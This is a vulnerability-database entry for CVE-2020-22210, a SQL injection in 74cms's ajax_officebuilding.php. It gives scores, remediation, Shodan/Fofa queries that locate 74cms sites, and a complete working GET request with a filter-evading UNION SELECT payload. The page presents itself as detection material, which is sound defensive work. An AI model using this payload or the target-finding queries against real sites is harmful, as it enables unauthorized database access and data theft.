🔙 목록으로 돌아가기

CVE-2020-22210: 74cms - ajax_officebuilding.php SQL Injection

Title74cms - ajax_officebuilding.php SQL Injection
Authorritikchaddha
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
RemediationApply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_officebuilding.php file.
CVSS Score9.8
EPSS Score0.45915
CVE IDCVE-2020-22210
CWE IDCWE-89
Shodan Queryhttp.html:"74cms"
Fofa Queryapp="74cms"body="74cms"
Tags cve cve2020 74cms sqli vuln

🔍 Vulnerability Description

A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php.

🌐 HTTP Request

GET /plus/ajax_officebuilding.php?act=key&key=%e9%8c%a6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(9115),5,6,7,8,9%23 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-22210.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-22210.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A